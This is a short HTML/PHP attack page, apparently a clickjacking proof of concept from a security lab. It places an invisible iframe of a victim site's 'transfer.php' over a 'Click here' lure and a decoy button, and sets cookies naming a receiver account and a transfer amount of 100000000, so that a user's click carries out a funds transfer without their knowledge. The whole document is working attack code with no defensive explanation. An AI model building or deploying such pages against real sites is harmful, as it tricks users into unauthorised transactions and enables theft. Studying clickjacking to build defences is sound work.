<!doctype html>
<html>

<head>
  <meta charset="UTF-8">
</head>

<body>

  <style>
    iframe {
      width: 400px;
      height: 400px;
      position: absolute;
      top: -35px;
      left: -14px;
      opacity: 0;
      z-index: 1;
    }
  </style>
   <?php
    setcookie("receiver", 94876884588323, time() + (86400 * 30), "/");
    setcookie("amount", 100000000, time() + (86400 * 30), "/");
    ?>
  <div>Click here</div>

  <!-- The url from the victim site -->
  <iframe src="transfer.php"></iframe>

  <button onclick="alert(1)">Check this out!</button>

  <div>...And you're cool (I'm a cool hacker actually)!</div>

</body>
</html>